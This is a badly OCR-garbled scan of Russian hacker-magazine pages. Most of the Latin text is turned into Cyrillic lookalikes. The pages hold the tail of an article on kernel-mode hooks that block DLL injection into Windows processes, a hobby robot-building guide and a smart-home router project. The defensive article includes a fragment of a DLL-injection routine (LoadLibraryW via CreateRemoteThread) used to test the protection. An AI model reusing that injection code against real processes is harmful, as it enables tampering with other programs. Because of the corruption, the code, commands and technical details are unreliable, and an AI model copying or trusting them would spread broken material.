С : \ѴѴШООѴѴ5\5у $^ет32\пккгп!ра . ехе 


7 


№Ассе5$СЬескВуТуреРе$иІШ5^АпсіАи<ЙАІа. . . 


- 


0х805Р43й4 


С : \№ІМООѴѴ5\$у 5кет32\п^кгпІра . ехе 


8 


№А<МА1от 


- 


0x806 153А2 


С : \ѴѴДОООѴѴ5\$у$^ет32\п*кг піра . ехе 


9 


МАсМВооКпкгу 


- 


0x806 160Е4 


С : \ѴШОО\Ѵ5\5у5*ет32\п*кгпІра . ехе 


10 


№ М )и5^Сгоир$Т океп 


- 


0х805ЕВЕОА 


С:\\Л/ІМООѴѴ5\5у5^ет32\п^кгпІра.ехе 


11 


М^АсІ)и5^РгіѵіІеде5Т океп 


- 


0Х805ЕВВ32 


С : \\А/ШОО Ѵ/5\$у 5^ет32\п^кгпІра . ехе 


12 


№АІегкКе$итеТЬгеас1 


- 


0х8О5О4ВЗА 


С : \ѴѴШООѴѴ5\$у5^ет32\п*кг піра . ехе 



РКУЫНООКЕР ПОКАЗЫВАЕТ УСТАНОВЛЕННЫЕ ДРАЙВЕРОМ ХУКИ НА550Т 




П НТТР://ѴѴѴѴѴѴ 

I г 

> Ііпкз 

•Для совершенст- 
вования навыков 
ковыряния ядра 
ѴѴі псіоѵѵз рекомендую 
к посещению форумы 
на гзбп.ги и ѵуазщти. 
• Много важной 
и интересной инфы 
о программировании 
ядра ѴѴі п содержится 
на пікегпеі.сот . 




> і пЕо 

Отключить автоза- 
пуск всех сменных 
носителей вѴѴіпсіоѵѵз 
можно, добавив 
в ветку реестра 
НКЕУ_СІЖКЕЫТ_ 
ИЗЕЩЗоббмагеХ 
Місгозобб\Міпс1омз\ 
СиггепбѴегзіоп\ 
Ро1ісіез\Ехр1огег 

ключ «ІЧоОгіѵеТуре 
АиІоРип» со значе- 
нием (Мб 



сіи на диске и перехватить ее через вызовы Ореп Рііе/ 
СгеаІеЗесІіоп/МарѴіеѵѵОиВесІіоп. Тоже самое, ноуже по- 
средством вызова аналогичных ядерных функций, можно 
сделать в ядре. Таким вот нехитрым образом мы сможем кон- 
трол и ровать за груз куб и бл и отек во все процессы в системе 
(естественно, ведьпІсКІ.сіипоумолчанию подгружается во 
все процессы): 

ШОКБ СебВІІЕипсбіопАсІсІгезз ( 
сііаг* ІрЕипсбіопЫате , 

РШІСОВЕ_8ТКШС рВІШате) 

{ 

2ѵЮрепЕі1е (...); 

2мСгеабе8есбіоп ( . . . ) ; 

2тоМарѴіеѵ\Юб8есбіоп ( . . . ) ; 

бозкеабег = ( ІМАСЕ_ВОЗ_НЕАВЕВ ЦШой; 
//здесь мы парсим экспортную таблицу 



бог (і = 0; 

і < рЕхрогбТаЫе-> ЫитЪегОбЕипсбіопз ; 

і++) 

{ 

бипсбіопЫате = (сЬ.аг*) ( (ВУТЕ* ) кМоб + 
аггауОбЕипсбіопЫатез [х] ) ; 
бипсбіопОгсІіпаІ = аггауОбРипсВіопОгсііпаІз [х] 
+ Вазе — 1; 

бипсбіопАбсІгезз = (ВШКВ) ( (ВУТЕ* ) Шоб + 
аггауОбЕипсбіопАскІгеззез 
[бипсбіопОгсІіпаІ] ) ; 
іб (КбІСошрагеЗбгіпд (&пбЕипсбіопВате , 
&пбЕипсбіопВате8еагсЪ., ТКЕТЕ) == 0) 
гебигп бипсбіопАббгезз ; 

} 

гебигп 0; 

} 

Драйвер, реализующий этот перехват ЫгбоасЮи, ты най- 
дешь на нашем диске. 

Существуетеще один, не слишком красивый и элегантный 



способ. Он позволяет проконтролировать ЫгбоасЮи, но 
уже в конкретном процессе. Так как мы находимся в ядре, 
то я не нашел ничего лучше, чем сделать следующее. Вы- 
зовом КеАИасЬРгосезз аттачимся в зѵсбозбехе и находим 
РЕВ (Ргосезз Епѵігоптепі Віоск; как это сделать, я также 
писал в майском тг і . А уже через него получаем указатель 
на Е0В_ВАТА_ТАВЕЕ_Е1\1ТРУ, который содержиттакое 
поле, как МобиІеВазеАббгезз. 

Идея такова: найдем по имени библиотеки пІсИЫИ адрес 
ее загрузки в зѵсбозі’е. Потом, используя этот адрес, 
п ропа реи м таблицу экспорта на предмет адреса функции 
ЕсІгЕоасЮи. И только затем подменим его на вызов своей 
функции туЕсІгЕоасЮи, которая будет отслеживать и пресе- 
катьзагрузку зловредных библиотек. Не слишком удобно и 
элегантно, но вполне работоспособно. Если знаешь способ 
лучше — напиши, обсудим. 

Итак, получаем: 



Находим адрес спроецированной 
в целевой процесс пісШ.сШ 

2ѵ\г<2иегуІпбогтабіопРгосезз ( 

ЫбСиггепбРгосезз ( ) , 
РгосеззВазісІпбогтабіоп, &РгосІпбо , 
зігеоб (РКОСЕЗЗ_ВА8ІС_ШЕОВМАТІ(Ж) , &8іге) ; 
рРеЬ = Ргосіпбо . РеЬВазеАббгезз ; 

//хотя можно просто так: рРеЬ 
(РЕВ*) 0х7ЕЕВЕ000 ; 

РРЕВ_ЬВВ_ВАТА бібг = рРеЬ->Ьбг; 

РЫ8Т_ЕЫТКУ ІпібіаІЕпбгу = 

Ьбг -> ІпібіаІігабіопОгбег . Еііпк; 
РЬВК_ВАТА_ТАВЬЕ_ЕМТЮГ ЦбгВабаТаЫеЕпбгу = 
СОЫТАШШС_КЕСОКВ ( ІпібіаІЕпбгу , 
ЬБК_ВАТА_ТАВЕЕ_ЕЫТКУ , 
ІпібіаІізабіопОгбег) ; 

РЫ8Т_ЕЫТКУ ЬоабОгбегЬізбНеаб = 

ЬбгВабаТаЫеЕпбгу->ЬоабОгбег . Вііпк; 

Далее нам остается только пропарсить полученный список 
на предмет имени библиотеки и адреса ее загрузки. 
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РТНКЕА^ЗТАІП^КОІГГШЕ р^пТЬгеасШсп = (РТНРЕАР_5ТАНТ_К0иТШЕ) 

СеьРгосАсісігезз (СесМосіиІеНапсіІе (ТЕХТ ( "Кегпе132 ") ) , "ЬоасІЫЪгагуИ") ; 



і і (ріпТІігеасШъп == ШІЬЬ) Іеаѵе; 

ЬТЫгеасІ в СгеаъеРетоьеТІігеасі (ЬРгосѳе 
ріпТІігеасіРъп, рзгЬіЪГіІеРегпоЪе, С 
±± (ЬТЬгеасІ == тіЬЬ) Іеаѵе; 

Ыаі^ЕогЗіпдІеОЬзесС (ЬТЬгеасі, ШЕШП 

іОк « ТРІІЕ; 



с Г ГіІе:///С:Д)оситеп*5 апб 5еШпд5/ 2(}(37К2740В(Ю097/Мои 

1 * - * - х - х - * - х - х - х §у 5 іеп Де Реп^е г х-х-х-х- х х - х - хх - х х 
Іх- х -х- х - хххх - х - хх - хх - ххх - хххххх - х - ххххххххххх - хх 



[ -► 1 Іоасііпд гігіѵеі*... 

[ + ] гігіѵег Іоасіегі... 

[ + ] Ъгуіпд *:о іпоесі; сШ. . . 

[(] сап'* іпоесі; Д11( • . . 

[ ♦ ] ехіЪ іпд. . . 



НАША ПРОАКТИВНАЯ ЗАЩИТА В ДЕЙСТВИИ 



ПЕРЕХВАТ ФУНКЦИЙ ДЛЯ РАБОТЫ 
С ВИРТУАЛЬНОЙ ПАМЯТЬЮ 

Таких функций несколько — 2ѵѵѴѴгіІеѴігІиаІ.Меітюгу, 
2ѵѵНеасІѴіг1:иаІМеппогу, ^ѵѵОрепРгосезз, 2\лЮирІісаІеОЬіес{ р 
^ѵѵОиегуІпІогтаІіопРгосезз и 2\л/РгоІесіѴіііиаІМетогу. Эти 
системные функции являются основными при манипуляци- 
ях с адресным пространством процесса. На их перехвате и 
отслеживании их вызова построена работа всякой уважаю- 
щей себя проактивной защиты. Не обойдем эти системные 
вызовы и мы. Сейчас я покажу, как подручными средствами 
организовать контроль их вызовов. Есть два способа: пере- 
хватить в ІІзегтобе или в ядре, пофиксив непосредственно 
таблицу экспорта пісИЫИ, или поступить как настоящие 
профессионалы — найти КеЭегѵісеОезсгірІюгТаЫе (только 
неспрашивай, что это такое, атоя втебе разочаруюсь]. Сам 
перехватможно сделатьлибо подменой адреса вызова, 
либо спласингом функции. 

ПЕРЕХВАТ КЕ5ТАСКАТТАСНРК0СЕ55 

Ну и напоследок, для успокоения совести, можно реали- 
зовать перехват ядерной функции КеАМасЬРгосезз или, 
как рекомендует М ісгогобТ, КеЗіаскАМасЬРгосезз, чтобы 
предотвратить инжект кода или манипуляции с памятью из 
ядра. Вызов этой функции из драйвера обеспечиваетаттач 
самого драйвера к адресному пространству целевого про- 
цесса и исполнение его кода. 

Эта функция не экспортируется из 550Т и чтобы ее 
перехватить, нужно либо пропарсить таблицу экс- 
порта ядра, либо вызватьтакую нехитрую ядерную 
функцию, как МтѲеіЗузІютРоибпеАсІсІгезз. О ней, 
кстати, очень часто забывают: РѴОЮ (ипс_аббгез = 
МтСеіЗузІютРоибпеАсІсІгеззІ &АріЫатеІІпісобе ]. Функ- 
ция вернет нам ее адрес. Что с ним делать, думаю, ты уже 
знаешь. Часто бывает, что самые вкусные и интересные 
функции ядра ѴѴіпбоѵѵз просто не экспортируются. В этом 
случае МтбеіЗузіетРоибпеАсІсІгезз вернет І\ІШ_І_. 

ОТМЕТАЯ ВОЗРАЖЕНИЯ 

Предвижу массу вопросов и возражений: мол, проблему 
можно решить другими, болеелегкими путями. Возможно. 
Но мне хотелось создать некоеуниверсальное решение, 
позволяющее обеспечить защиту системных процессов от 




ТА САМАЯ ОЫ.-КА 



внедрения постороннего кода. Стоит добавить, что суще- 
ствует еще одно достаточно нетривиальное и элегантное 
решение, нацеленное на контроль процессов в системе. 
Речь идет о перехвате такой системной функции, как 
ЫіАсУизіРгіѵіІедезТокеп. Она используется для получения 
привилегий отладки, и контроля ее вызова иногда бывает 
достаточно для блокировки доступа к системным процес- 
сам. Уверен, что после прочтения статьи, ты легко сможешь 
реализовать эту идею сам. 

В конце хочу еще раз напомнить, что программирование 
в ядре сродни собиранию «кубика-рубика» в темноте 
— из-за затруднений с отладкой драйвера. Поэтому на 
первых порахтебе не раз придется лицезреть ВЗОР. 

Ну а для его анализа и, как правило, отладки драйве- 
ра, нужен ѴѴіпОВО и какой-нибудь ядерный отладчик. 

Я, к примеру, пользуюсь Іттипііу беЬиддег’от, что, 
впрочем, дело вкуса. Удачного компилирования и да 
пребудет с тобой Сила! ЗС 




> СІѴСІ 

Надискеты найдешь 
сорцы драйверов, ре- 
ализующих перехват 
основных системных 
функций, тулзы и бо- 
нусные доки, которые 
помогуттебе в про- 
граммировании. 



ХАКЕР 08 /128/ 09 



► 105 









рЬгеакіпд 












М 8 *^ 



шт ~ 88 



1 ;?' 







ѵ 



Создаем робота в домашнихусловиях 



Собрать простого робота может любой, кто умеет правильно держать 
паяльник в руках и для этого не нужно глубоких знаний (хотя они и не 
помешают). Любительское роботостроение мало отличается от схемо- 
техники, только гораздо интереснее, потому что тут затронуты такие 
области, какмеханика и программирование. Все компоненты легко- 
доступны и стоят не так уж дорого. 



ПРОГРЕСС НЕ СТОИТ НА МЕСТЕ 

Что такое робот? В большинстве случаев — это автоматическое устройст- 
во, которое реагирует на какие-либо действия окружающей среды. 
Роботы могутуправляться человеком или выполнять заранее запрог- 
раммированные действия. Обычно на роботе располагают разнооб- 
разные датчики (расстояния, угла поворота, ускорения), видеокамеры 
и манипуляторы. Электронная часть состоит из микроконтроллера (МК) 

— микросхемы, в которую заключены процессор, тактовый генератор, 
различная периферия, оперативная и постоянная память. В мире су- 
ществует огромное количество разнообразных микроконтроллеров для 
разных областей применения и с ними можно собирать мощных роботов. 
Для любительских проектов широкое применение нашли микроконт- 
роллеры АѴВ. На сегодня они наиболее доступны, и в интернете можно 
найти много примеров на основе этих МК. Чтобы работать с микрокон- 
троллерами, тебе нужноуметь программировать на ассемблере или на 
С++ и иметь начальныезнания в цифровой и аналоговой электронике. В 
нашем проекте мы будем использовать С++. Программирование для МК 
мало отличается от программирования на компьютере: синтаксис языка 
такой же, большинство функций практически ничем не отличаются, а 
новые довольно легко освоить и ими удобно пользоваться. 

ЗАКУПАЕМСЯ МАТЕРИАЛАМИ 

Наш робот должен уметь объезжать препятствия, то есть повторять 
нормальное поведение большинства животных в природе. Все, что нам 
потребуется для постройки такого робота, можно найти в радиотехничес- 
ких магазинах. Давай решим, какнаш робот будет передвигаться. Самым 
удачным вариантом я считаю гусеницы, которые применяются в танках, 
потому что гусеницы имеют большую проходимость, чем колеса ними 



удобнее управлять (для поворота достаточно вращать гусеницы в разные 
стороны). Поэтомутебе понадобится любой игрушечный танк, у которого 
гусеницы вращаются независимо друг от друга. Такойты можешь купить 
в любом магазине игрушекпо разумной цене. От этого танка нужнатоль- 
ко платформа с гусеницами и моторы с редукторами. Остальное можно 
смело открутить и выкинуть. Также нам потребуется микроконтроллер. 
Мой выбор пал на АТтедаІб — у него достаточно портовдля подключе- 
ния датчиков и периферии, и вообще он довольно удобный. Еще надо 
закупить немного радиодеталей (списокты увидишь во врезке), пригото- 
вить паяльник, мультиметр и прямые руки. 

ПРАВИЛЬНОЕ ПИТАНИЕ — ЗАЛОГЗДОРОВЬЯ 

Микроконтроллер будет выполнять функции «мозга», но начнем мы не с 
него, а стого, как правильно кормить нашего робота, потому что на этом 
обычно ошибаются начинающие роботостроители. Чтобы робот работал 
нормально, нужно использовать стабилизатор напряжения. Я предпочи- 
таю микросхему І_7805 — на выходе она выдает стабильное напряжение 
5 В, которое и нужно нашему микроконтроллеру. Нотак как падение 
напряжения на этой микросхеме составляет порядка 2,5 В, к нему нужно 
подавать, минимум, 7,5 В. Вместе с стабилизатором используются элек- 
тролитические конденсаторы, чтобы сгладить пульсации напряжения. В 
цепь обязательно включаютдиод, для защиты от переполюсовки. 

ДЕЛАЕМ ПЛАТУ С МК 

Теперь мы можем заняться нашим микроконтроллером. Корпусу МК 
— ЭІР (такудобнее паять) и имеет сороквыводов. На борту есть АЦП, 
ШИМ, ІІ5АВТ и многое другое, что мы пока использовать не будем. На 
дискеты найдешьвсю схему робота, такчто вэтом разделе мы остано- 
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МОЯ ПЛАТАУПРАВЛЕНИЯ РОБОТОМ ТРИ ВАЖНЫХ КОМПОНЕНТА РОБОТОТЕХНИКИ 




ВАРИАНТУСТАНОВКИ ДАТЧИКОВ НА РОБОТА 



вимся только на обвязке самого МК. Рассмотрим несколько важных 
узлов. Вывод РЕ5ЕТ (9-ая нога МК] подтянут резистором В1 к«плюсу» 
источника питания. Это нужно делать обязательно, иначе твой М К может 
непреднамеренно сбрасываться или, проще говоря — глючить. Также 
желательной, но необязательной мерой является подключение РЕЭЕТ'а 
через керамический конденсатор С1 к«земле». На схеметы можешь 
увидеть электролит на 1000 мкФ, — он спасает от провалов напряжения 
при работе двигателей, что тоже благоприятно скажется на работе мик- 
роконтроллера. Кварцевый резонаторХІ и конденсаторы С2, СЗ нужно 
располагать как можно ближе к выводам ХТАИ и ХТАЕ2. 

Этом, как прошивать МК, я рассказывать не буду, — об этом ты можешь 
прочитать в интернете. Писать программу мы будем на С++. В качестве 
среды программирования я выбрал СосІеѴізіопАѴВ. Эта среда удобна 
новичкам, потому что имеет встроенный мастер создания кода. 



" аккумулятора 




СХЕМАДРАИВЕРАДВИГАТЕЛЕИ 



УПРАВЛЕНИЕ ДВИГАТЕЛЯМИ 

Не менее важным компонентом в нашем роботе будет драйвер двига- 
телей. Никогда и ни в коем случае не подключай двигатели напрямую 
к МК! Вообще, мощными нагрузками нельзя управлять с микроконт- 
роллера напрямую, иначе он сгорит. Пользуйся ключевыми транзис- 
торами. Для нашего случая есть специальная микросхема — Е2930. 

В подобных несложных проектах всегда старайся использовать 
именно эту микросхему с индексом «й», так как она имеет встроен- 
ные диоды для защиты от перегрузок. Ей очень легко управлять и 
ее просто достать в радиотехнических магазинах. Выпускается она 
в двух корпусах — йІР и 50ІС. Мы будем использовать в корпусе ОІР 
из-за удобства монтажа на плате. Е2930 имеет раздельное питание 
двигателей и логики, поэтому саму микросхему мы будем питать от 
стабилизатора (вход Ѵ55], а двигатели — напрямую от аккумуляторов 
(вход Ѵ5]. Е2930 выдерживает нагрузку 600 мА на каждый канал, а этих 
каналову неедва. То есть, кодной микросхеме можно подключить 
два двигателя. Но, чтобы перестраховаться, мы объединим каналы, 



Совет №3. Работай на свежем воздухе! 

Есть ноутбук? Отлично! ѴѴі-Рі — твой друг. Садись хоть в парке, хоть 
на балконе - и вперёд! Пока ещё не холодно, хуже точно не будет, 
а мозг себе провентилируешь. 
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Л НЕОБХОДИМЫЕ л 
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Вот списоктого, что тебе 
нужно приобрести: 

• АТтедаІб в корпусе 01 Р-40 

• 17805 в корпусе ТО-220 

• 12930 в корпусе ОІР-1 6 х2 
шт. 

• резисторы мощностью 0,25 
Вт номиналами: 1 0 кОм хі шт., 
220Омх4шт. 

• конденсаторы керамичес- 
кие: 0.1 мкФ, 1 мкФ, 22 пФ 

• конденсаторы электролити- 
ческие: 1000 мкФх 16 В, 220 



мкФх 16В х2 шт. 

• диод 1 N4001 или 1 N4004 

• кварцевый резонатор на 
16МГц 

• ИК-диоды: подойдутлюбые 
в количестве двух штук 

• фототранзисторы, тоже лю- 
бые, но реагирующие только 
на длину волны ик-лучей 
Адреса магазинов, в которых 
ты можешь все это купить, 
нетрудно найти в интернете 
— или напиши мне на почту. 





ПРИНЦИП РАБОТЫ ДАТЧИКА ПРЕПЯТСТВИЯ 



ял 

220 0м 



Т2 






Р5 ,] 



Т1 



220 0м 






02 

І_ЕО 



-^ы 



ОЗ 



і_Ей 






Я2 

220 0м 



РЗ 

220 0м 



СХЕМА ВКЛЮЧЕНИЯ ДАТЧИКОВ 



и тогда потребуется по одной микре на каждый двигатель. Отсюда 
следует, что І_2930 сможет выдержать 1 .2 А. Чтобы этого добиться, нужно 
объединить ноги микры, как показано на схеме. Микросхема работает 
следующим образом: когда на I N 1 и I N2 подается логический «О», а на 
I N3 и I N4 — логическая единица, то двигатель вращается в одну сторону. 
Аесли инвертировать сигналы — подать логический ноль, то двигатель 
начнет вращаться в другую. Выводы ЕІ\І1 и ЕЫ2 отвечают за включение 
каждого канала. Их мы соединяем и подключаем к«плюсу» питания 
от стабилизатора. Так как микросхема греется во время работы, а 
/становка радиаторов на этоттип корпуса проблематична, то отвод 
тепла обеспечивается ногами СШ — их лучше распаивать на широкой 
контактной площадке. Вот и все, что на первое время тебе нужно знать 
о драйверах двигателей. 

ДАТЧИКИ ПРЕПЯТСТВИЙ 

Чтобы наш роботмогориентироваться и не врезался во все подряд, 
мы установим на него два инфракрасных датчика. Простейший датчик 
состоит из ик-диода, который излучает в инфракрасном спектре, и фо- 
тотранзистора, который будет принимать сигнал с ик-диода. Принцип 
такой: когда перед датчиком нет преграды, то ик-лучи не попадают на 
фототранзистор, и он не открывается. Если перед датчиком препятст- 
вие, то лучи отнего отражаются и попадаютнатранзистор — тот откры- 
вается, и начинаеттечьток. Недостаток датчиков втом, что они могут 
по-разному реагировать на различные поверхности и не защищены от 
помех — от посторонних сигналов других устройств датчик случайно 
может сработать. От помех защитит модулирование сигнала, но пока мы 
этим заморачиваться не будем. Для начала и этого хватит. На рисунке ты 
увидишь, как правильно расположить элементы датчика, а на схеме — 
их правильное включение. 



ПРОШИВКА РОБОТА 

Чтобы оживить робота, для него нужно написать прошивку, то есть 
программу, которая бы снимала показания сдатчиков и управляла 
двигателями. Моя программа наиболее проста: не содержит сложных 
конструкций и всем будет понятна. Вотэти две строки подключают 
заголовочные файлы для нашего микроконтроллера и команды для 
формирования задержек: 

«ЧТОБЫ ОЖИВИТЬ РОБОТА, 
ДЛЯ НЕГО НУЖНО НАПИСАТЬ 
ПРОШИВКУ, ТО ЕСТЬ ПРО- 
ГРАММУ, КОТОРАЯ БЫ СНИ- 
МАЛА ПОКАЗАНИЯ 
СДАТЧИКОВ И УПРАВЛЯЛА 
ДВИГАТЕЛЯМИ». 

#іпс1исІе <шеда1б.Ь> 

#іпс1исІе <с1е1ау.Ъ> 

Нижеследующие строки условные, потому что значения РОРТС зависят 
оттого, какты подключил драйвер двигателей ксвоему микроконтрол- 
леру: 
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ПЛАТФОРМА НА ГУСЕНИЦАХ 



ВОТТАКОЙ РОБОТ ПОЛУЧИЛСЯ У МЕНЯ, ТОЛ ЬКО 
С ДРУГИМИ ДАТЧИКАМИ 



СХЕМА РОБОТА 




указывает на то, что пройдет одна секунда, прежде чем начнетвыпол- 
няться следующая команда. 



РОКТС . О = ОхРР ; 

РОКТС. 1 = 0x00; 

РОКТС. 2 = ОхРР; 

РОКТС. 3 = 0x00; 

«ОхРР» означает, что на выходе будет лог. «1», а «0x00» — лог. «0». 

Этой конструкцией мы проверяем, есть ли перед роботом препятствие и 
с какой оно стороны: 

\1 (!(РШВ& (1«РШВ.0))) 

{ 



} 



Если на фототранзистор попадаетсветотик-диода.то на ноге микрокон- 
троллера устанавливается «0», и робот начинает движение назад, чтобы 
отъехать от препятствия. Потом разворачивается, чтобы снова не столк- 
нуться с преградой, и затем опять едет вперед. Так каку нас два датчика, 
то мы проверяем наличие преграды два раза — справа и слева, и потому 
можем узнать, с какой стороны препятствие. Команда «сІеІау_пп5( 1 000)» 



СО Б РАТЫЕРМ И НАТО РА 



Я рассмотрел большинство аспектов, которые помогуттебе собрать 
первого робота. Но на этом робототехника не заканчивается. Если 
справишься с первым этапом, то у тебя появится куча новых возмож- 
ностей. Можноусовершенствовать алгоритм робота, — например, что 
делать, если препятствие не с какой-то стороны, а прямо перед робо- 
том? Также не помешаетустановитьэнкодер — простое устройство, ко- 
торое поможетточно знать расположение робота в пространстве. Для 
наглядности возможна установка цветного или монохромного дисплея, 
который будет показыватьуровеньзаряда аккумулятора, расстояние 
до препятствия и различную отладочную информацию. Не помешает 
усовершенствовать датчики — установить Т50Р (это ик-приемники, 
которые воспринимаютсигнал только определенной частоты] вместо 
обычных фототранзисторов. Помимо инфракрасных датчиков сущес- 
твуютультразвуковые; стоят подороже и тоже не лишены недостатков, 
но в последнее время набирают популярностьу роботостроителей. 
Чтобы робот мог реагировать на звук, было бы неплохо установить 
микрофоны сусилителем. Но по-настоящему классным я считаюуста- 



новку камеры и программирование на ее основе машинного зрения 



Есть набор специальных библиотек 0 реп СѴ, с помощью которых можно 
запрограммировать распознавание лиц, движения по цветным маякам 
и много всего интересного. Все зависит только от твоих фантазии и 
умений, "г 
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АЛЕКСЕЙ «С ИЛ5ТЕР» АВДЮХИН / СІ.и5ТЕКККгаСІ.и5ТЕККК.С0М / 









ЧТО НАМ СТОИТ 

«УМНЫЙ дом» 

ПОСТРОИТЬ 



Делаем фарш из микроконтроллеров и роутера 

В этой статье я расскажу историю создания собственного «умного 
дома». Идея стара, как мир, но свой агрегатя подружил с бытовым 
роутером от АБІІ8! Это дало полноценный контроль над устройства ми 
по сети с помощью программного обеспечения для І_іп их. Хочешь 
узнать, как выжать из «железа» роутера максимум? 



С ЧЕГО ВСЕ НАЧИНАЛОСЬ... 

С детства у меня было желание автоматизировать в своей комнате 
все, что только можно. Иными словами, сделать «умный дом». И 
чем умнее, тем лучше. Основная цель — это дистанционно включать 
и выключать различные устройства: лампы, люстру, розетки и пр. 
Когда-то я не был знаком с микроконтроллерами и делал все через 
І_РТ-порт компьютера. Сказать, что это было неудобно — не сказать 
ничего. Компьютер я не выключал никогда, при каждой перезагрузке 
в комнате начиналась «дискотека», а при переустановке системы 
вообще приходилось сидеть в темноте. Изучение микроконтроллеров 
изменило ситуацию. Я задумал создать устройство, которое будет 
выполнять те же функции, но при этом должно легко управляться с 
компьютера и в то же время быть независимым от него. 

Решение вполне очевидно. Устройствами управляет микроконтроллер 
АТтедаІб, который связывается с компьютером через СОМ-порт. Для 
включения и выключения устройств я взял несколько электромагнитных 
реле. Использовать их очень просто: подаем питание, и они замыкают 
контакты. Думаю, тебе уже известно, что логическая единица на ноге 
микроконтроллера АѴР — это примерно +5 вольт, а логический ноль — 
соответственно, 0 вольт. Однако подключать реле напрямую нельзя. 
Во-первых, 5 вольт может быть мало. Во-вторых, нельзя, чтобы через ногу 
микроконтроллера шел слишком большой ток. Надо использовать проме- 
жуточные реле или транзисторы; соответствующая схема приведена на 
рисунке. Сточки зрения прошивки это самая простая часть. Записываем 
логическую единицу в бит соответствующей ноги (в регистре РОВТх, гдех 
— буква порта), и свет в комнате включается. Записываем ноль — выклю- 
чается. Проще уж точно некуда. Теперь про связь с компьютером через 
СОМ-порт — для этого используется встроенный в микроконтроллер 
ІЭЗАВТ-порт. Пример работы с ним подробно рассматривался в прошлом 



номере (статья «Высокий уровень программирования, пишем на Си под 
АѴР»), Нестоитзабыватьотом, что должна быть возможностьуправлять 
всем и без компьютера; центральный блокдолжен быть самостоятельным 
устройством. Поэтому я также подключил кмикроконтроллерутекстовый 
ЖК-дисплей и кучу кнопок. С помощью всего этого было решено реа- 
лизовать простенький интерфейс из нескольких меню. А если уже есть 
дисплей, то почему не сделать возможность выводить на него произволь- 
ную информацию, получаемую с компьютера? 

ПРАВДА, КРУТО? 

И я это сделал. Затем начали появляться другие идеи: ДУ приемник 
для управления с пульта отлюбого телевизора, термодатчики для 
отображения температуры на улице и в комнате; датчик движения 
для автоматического отключения света, когда меня нет. Проект очень 
активно развивался. Протокол для взаимодействия с компьютером 
усложнился. Для ѴѴіпбоѵѵз была разработана соответствующая про- 
грамма, которая командовала устройству включать/выключать люстру 
при нажатии «горячих» клавиш на клавиатуре, ставила в аське/мирке 
статус «отошел», если датчик движения долго меня не замечал, выво- 
дила текст сообщений из той же аськи/мирки на ЖК-дисплей. А также 
делала многие другие фишки. 

ПОДВОДНЫЕ КАМНИ, 

ИЛИ ИСПОЛЬЗУЕМ СЕТЬ 

При всем этом начали проявляться другие траблы. «Умный дом» 
взаимодействовал с компьютером, но только с одним. А мне хотелось, 
чтобы я могуправлять всем с любого устройства по сети, будьто мо- 
бильный телефон, ІЧіпіепсІо 05 или же просто удаленный компьютер. 
Первое решение, которое пришло в голову, было достаточно ба нал ь- 
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РОУТЕР НАСТЕНЕ. ДЛЯ СОМ-ПОРТАЯ ВЫВЕЛ НЕИС- 
ПОЛЬЗУЕМЫЕ ПРОВОДА ИЗ ВИТОЙ ПАРЫ 




УПРАВЛЯЕМ «УМНЫМ ДОМОМ» С МОБИЛКИ 




СЕТЕВАЯ РОЗЕТКА СТАЛА ЕЩЕ И СОМ-РОЗЕТКОЙ 




ВНЕШНИЙ ВИД УСТРОЙСТВА 



ным. Я доработал программу, которая общается через СОМ-портс 
«умным домом», так, чтобы она принимала подключения по сети, 
позволяя управлять всем удаленно. 

В итоге я вернулся ктому, с чего начинал: компьютер приходилось 
постоянно держать включенным. 

Мною были рассмотрены различные способы работы с после- 
довательным портом через сеть. Решение нашлось, когда я 
приобрел роутер А51І5ѴѴІ_-500дР. Дело в том, что в этом заме- 
чательном устройстве крутится Ыпих, а внутри роутера есть 
два ЮАРТ-порта, которые используются на заводе для отладки. 



Один из них позволяет работать с системной консолью, а второй 
совсем никак не используется. Именно это нам и надо! Ничто не 
мешает превратить ЮАРТ в СОМ-порты, используя микросхему 
МАХ3232. Именно та кя и сделал. Подробнее фича рассматрива- 
лась совсем недавно, в т № 125 (статья Сергея Долина «Великий 
и могучий ЮАРТ »). Итак, мы получили роутер, где есть Ыпих, сеть и 
СОМ-порты — идеальное устройство для моих целей, так как работает 
круглосуточно, не шумит и электричества кушает мало. С аппаратной 
точки зрения решение найдено, но как быть с софтом? И я задался 
вопросом программирования под роутер. 
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Л АЛЬТЕРНАТИВНЫЕ л 

Ѵ МЕТОДЫ 

ЩЩЩск 

і Если ты не хочешь разбирать свой роутер, то можешь просто купить 115В- і 

і і 

і СОМ шнурок и воткнуть его в ІІ5В-порт. В прошивке Олега уже есть драй- > 
вера для таких устройств на основе чипа «р12303». Достаточно загрузить 
] модули командами «іпзтосі изЬзегіаІ.о» и «іпзтосі р12303.о». В результате [ 

! появится еще один порт «/сІеѵ/изЬ/Мз/О». і 



буду краток. В ІІ5В-порт я воткнул флешку побольше, 
подключился к роутеру телнетом и выполнил следующие 
команды: 

УСТАНОВКА ІРКЗ 

шоипС /сіеѵ/зсзі /іюзкО /ЪизО /кагдекО / ІипО / 

рагкі /орк 

іркд . зЪ. ирсіаке 

іркд.зЪ. іпзкаіі іркд-орк 

іркд ирсіаке 

Обрати внимание, что «/беѵ/зсзі/ЬозШ/ЬизОАагдеШ/ 

Іи пО/ра гі; 1 » — это ЕХТЗ-раздел на моей флешке. Она уже 
разбита и отформатирована; соответственно, утебя путь 
может отличаться. Полагаю, ты уже знаешь, как исполь- 




ПЛАТА ДЛЯ МАХ3232 




> СІ ѴСІ 



На диске ты найдешь 
исходники моей про- 
граммы для роутера. 
Используй ее 
в качестве примера. 



«ОЛЕГОВСКИЕ» ПРОШИВКИ 

Многие роутеры от А51І5 стали популярны благодаря так 
называемым «олеговским» прошивкам, которые раз- 
рабатывает наш соотечественник Олег (увы, фамилию 
свою он нигде не упоминает). Эти прошивки позволяют 
получить полноценный доступ кЛинуксу, а на продви- 
нутых моделях еще и устанавливать дополнительный 
софт. Скачать это чудо можно на официальном сайте: 
ЬЛрѴ/оІед.ѵѵІбООд.іпЬ . Когда я впервые поставил такую 
прошивку на свой ѴѴІ_-500дР, счастью не было предела. 
После небольших манипуляций установка софта свелась 
к простому использованию менеджера пакетов «іркд». 
Эта тема подробно рассматривалась в статье Эіер’а [ тг 
№106, статья «І_еѵеІ-ир для точки доступа»), поэтому 



зовать «ісі ізк» и «тке215»; я опущу эти инструкции. Да, и 
не забывай, что при этом у роутера должен быть доступ в 
интернет, — он будет сам качать пакеты. Чтобы монтиро- 
вание производилось автоматически после загрузки, я 
выполнил еще несколько команд: 

АВТОМАТИЧЕСКОЕ МОНТИРОВАНИЕ ФЛЕШКИ 

есію "#! /Ып/зЬ" > /изг/ Іосаі /зЪіп/розк- 
шоипС 

есію "шоипС /сіеѵ/зсзі/іюзкО/ЬизО/кагдекО/ 
